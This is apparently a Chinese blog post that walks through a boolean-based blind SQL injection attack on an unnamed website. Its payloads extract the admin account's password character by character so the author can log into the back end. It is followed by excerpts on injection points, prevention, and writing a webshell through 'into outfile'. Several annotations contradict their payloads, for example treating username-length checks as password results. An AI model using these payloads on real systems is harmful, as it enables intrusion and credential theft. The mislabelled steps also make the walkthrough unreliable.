1.尋找目標
目標**:
2.測試目標
and 1=1 返回正常
and 1=2 返回異常
and 1=(select min(id) from admin)and 1=(select min(id) from admin) 返回正常 說明存在
and 1=(select min(id) from admin where len(username)>4) 返回正常,確定密碼大於4位
and 1=(select min(id) from admin where len(username)<8) 返回正常,確定密碼小於8位
and 1=(select min(id) from admin where len(username)=6) 返回正常,確定密碼等於8位
and 1=(select min(id) from admin where left(username,1)='1') 返回正常,確定管理員編號為第一位
and 1=(select min(id) from admin where left(password,1)='3') 返回正常,猜測密碼
and 1=(select min(id) from admin where left(password,6)='335500') 返回正常,猜測密碼
根據猜測帳號,密碼,然後選擇登陸視窗登陸後台!呵呵
SQL注入之提交方式的注入
1 get get是從伺服器上獲取資料,不和伺服器產生互動 get注入 平時訪問網頁測試注入點,對它進行注入就是get注入方式。2 post post是向伺服器傳送資料。post提交方式主要適用於表單的提交 post注入 主要用於登入框的注入。3 cookie cookie提交用於賬號密碼的cook...
防止SQL注入的幾種方式
1 什麼是sql注入 簡而言之,就是客戶端向服務端傳送請求時,將sql指令插入到form表單或者url中,達到欺騙伺服器的目的,最終這些注入進去的sql指令就會被伺服器誤認為是正常的sql指令而執行,因此服務端的資訊就存在被破壞或是洩露的危險。2 sql注入的防護 了解了sql注入,就需要有針對性的...
SQL注入寫WebShell方式小結
這裡小結一下通過sql注入寫入webshell的方法。通過sql注入select into outfile實現,如 1 union select 1,into outfile var www tmp nb.php 前提都是需要對目標目錄具有寫許可權。互動式命令執行,注意在使用互動式方式時需要知道 的...